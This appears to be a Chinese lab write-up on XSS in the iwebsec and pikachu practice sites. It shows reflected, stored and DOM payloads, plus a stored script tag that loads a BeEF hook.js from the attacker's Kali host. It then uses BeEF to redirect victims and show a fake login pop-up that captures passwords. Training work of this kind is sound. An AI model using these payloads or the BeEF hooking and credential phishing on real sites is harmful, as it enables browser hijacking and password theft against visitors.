0
点赞
收藏
分享

微信扫一扫

XSS测试

诗与泡面 2022-05-21 阅读 64


1.反射型XSS

(1)正常访问http://192.168.4.130/xss/01.php?name=iwebsec

XSS测试_留言板

(2)反射型XSS测试语句

http://192.168.4.130/xss/01.php?name=<script>alert('ctfs')</script>

XSS测试_留言板_02

2.存储型XSS

访问:​​http://192.168.4.130/xss/02.php​​

(1)     
输入你的留言信息:ctfs

XSS测试_php_03


(2)     
输入你的留言信息:
<script>alert(/ctfs/)</script>

XSS测试_留言板_04

3. DOM型XSS

(3)     
输入内容:ctfs0.

XSS测试_php_05

(4)     
输入内容: <img  src=1 
onerror=alert(/ctfs/)  />

XSS测试_留言板_06


4. XSS漏洞利用

(1)在页面上输入http://127.0.0.1/pikachu/,进入到pikachu的网站界面。192.168.4.130/pikachu/

XSS测试_php_07

       2、在站点上进行各种各样的篡改页面gj

2.1、打开之前搭建好的pikachu站点,然后在XSS留言板的界面输入XSS JavaScript的命令:<script src=http://Kali IP地址:3000/hook.js></script>,脚本的意思是将站点需要的内容输入到hook.js文件,然后在hook.js实现gj,点击提交,此时模仿的是gj者将gj脚本放在了留言板上,一旦有用户阅览该留言板就会执行该XSS JavaScriptgj脚本,从而被beef-xss软件控制。XSS测试_php_08

       (2)此时模仿用户登录了该留言XSS测试_php_09板的界面,阅读了该留言板的内容。

(3)此时gj者在bXSS测试_留言板_10eef-xss平台上就收到了刚刚阅读用户的信息。

       (4)接下来就开始实施篡改页面gj,首先是对用户的页面进行重定向,我们点击Browser—>Hooked Domain —>Redirect Browser,然后输入https://www.baidu.com,然后点击右下角的Execute,然后用户的浏览器的该页面就会跳转到百度的页面了。XSS测试_javascript_11

XSS测试_javascript_12

       (5)接下来进行社工弹窗gj,我们点击Social Engiineering——>Pretty Theft ,然后右上角选择弹窗的类型,右下角点击 Execute,可以在浏览器弹出账户登录过期的显示,然后要求账户重新输入账户密码。

XSS测试_留言板_13

       (6)然后浏览器那边就会弹出框,用户就有可能在弹框中输入账号密码。XSS测试_php_14

       (7)如果用户输入了用户名和密码,点击了Log in的话,黑客在beef后台就会获取到账户刚刚输入的账号密码。

3、(附加题)在beef软件上尝试更多篡改页面的gj。



举报

相关推荐

0 条评论